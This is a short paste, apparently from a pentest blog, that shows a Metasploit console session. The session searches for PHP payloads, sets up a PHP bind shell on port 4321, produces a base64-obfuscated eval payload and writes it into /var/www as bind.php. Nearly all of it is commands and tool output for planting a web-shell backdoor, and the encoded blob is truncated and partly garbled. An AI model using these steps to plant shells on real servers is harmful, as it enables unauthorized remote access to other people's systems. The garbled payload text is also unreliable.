YeiZeta

Metasploit Shell php

Oct 1st, 2012
       =[ metasploit v3.5.2-beta [core:3.5 api:1.0]
+ -- --=[ 644 exploits - 328 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11722 updated 4 days ago (2011.02.08)

msf > search php
[*] Searching loaded modules for pattern 'php'...
<--BIG SNIP-->
NOP Generators
==============

   Name         Disclosure Date  Rank    Description
   ----         ---------------  ----    -----------
   php/generic                   normal  PHP Nop Generator


Payloads
========

   Name                         Disclosure Date  Rank    Description
   ----                         ---------------  ----    -----------
   php/bind_perl                                 normal  PHP Command Shell, Bind TCP (via perl)
   php/bind_php                                  normal  PHP Command Shell, Bind TCP (via php)
   php/download_exec                             normal  PHP Executable Download and Execute
   php/exec                                      normal  PHP Execute Command
   php/meterpreter/bind_tcp                      normal  PHP Meterpreter, Bind TCP Stager
   php/meterpreter/reverse_tcp                   normal  PHP Meterpreter, PHP Reverse TCP stager
   php/meterpreter_reverse_tcp                   normal  PHP Meterpreter, Reverse TCP Inline
   php/reverse_perl                              normal  PHP Command, Double reverse TCP connection (via perl)
   php/reverse_php                               normal  PHP Command Shell, Reverse TCP (via php)
   php/shell_findsock                            normal  PHP Command Shell, Find Sock

msf > use php/bind_php
msf payload(bind_php) > show options

Module options (payload/php/bind_php):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address

msf payload(bind_php) > set RHOST 192.168.1.5
RHOST => 192.168.1.5
msf payload(bind_php) > set LPORT 4321
LPORT => 4321
msf payload(bind_php) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -E        Force encoding.
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -e <opt>  The name of the encoder module to use.
    -f <opt>  The output file name (otherwise stdout)
    -h        Help banner.
    -i <opt>  the number of encoding iterations.
    -k        Keep the template executable functional
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The Platform for output.
    -s <opt>  NOP sled length.
    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -x <opt>  The executable template to use

msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
msf payload(bind_php) > exit

root@pentest101-desktop:/var/www# echo '<?php eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK)); ?>' > bind.php

#pentest101.blogspot.com